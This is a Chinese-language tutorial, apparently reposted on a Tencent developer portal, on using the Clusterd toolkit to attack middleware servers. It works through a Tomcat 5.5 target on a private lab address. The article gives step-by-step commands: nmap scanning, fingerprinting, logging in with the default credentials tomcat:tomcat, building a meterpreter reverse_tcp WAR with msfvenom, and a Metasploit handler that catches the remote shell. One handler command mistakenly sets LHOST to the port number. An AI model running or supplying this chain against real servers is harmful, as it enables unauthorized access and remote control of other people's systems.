首页
学习
活动
专区
工具
TVP
发布

中间件渗透工具-Clusterd

关于Clusterd

Clusterd是一款专门用于攻击应用服务器开源工具包,可以自动化的识别服务器指纹、探测并且自动对服务器进行攻击。简而言之clusterd就是一个中间件渗透软件,它能识别的中间件件有JBoss、ColdFusion、WebLogic、Tomcat、Railo、Axis2、Glassfish。

使用参数

中间参数

使用范例(tomcat为例)

使用nmap扫描目标常用端口

nmap -sS -sV -o 192.168.0.5

nmap扫描出目标tcp8180端口是tomcat服务,目标服务是linux;利用clusterd确定tomcat详细信息

clusterd -i 192.168.0.5 -p 8180 -a tomcat -o linux --tc-info

确定tomcat版本是5.5版本

查看tomcat部署项目

clusterd -i 192.168.0.5 -p 8180 -a tomcat -o linux -v 5.5 --tc-list

成功得到部署的项目列表

尝试clusterd生成msf监听war包

clusterd --gen-payload 192.168.0.103:8888 -o linux -a tomcat -v 5.5

生成war包出错,因为msf在新版本中不在使用msfpayload生成war包;既然不能生成,肯定不能对应的部署war了。如何解决?

通过前面的tomcat项目列表可知道clusterd对tomcat管理控制台进行了爆破,那说明账号密码就在代码中

。通过参数参照tomcat管理控制台密码

clusterd -i 192.168.0.5 -p 8180 -a tomcat -v 5.5 --usr-auth tomcat:tomcat

出错,尝试tomcat:tomcat

clusterd -i 192.168.0.5 -p 8180 -a tomcat -v 5.5 --usr-auth tomcat:tomcat

未出错。确定确定为tomcat:tomcat。利用msf生成war包

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 -f war > shell.war

msf进行监听

msfconsole -x "use exploit/multi/handler; set LHOST 192.168.0.103; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 4444; run"

手动部署war包到管理控制台,msf端成功监听

接下来就可以利用msf进行后期渗透了。

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20180203G06QV500?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券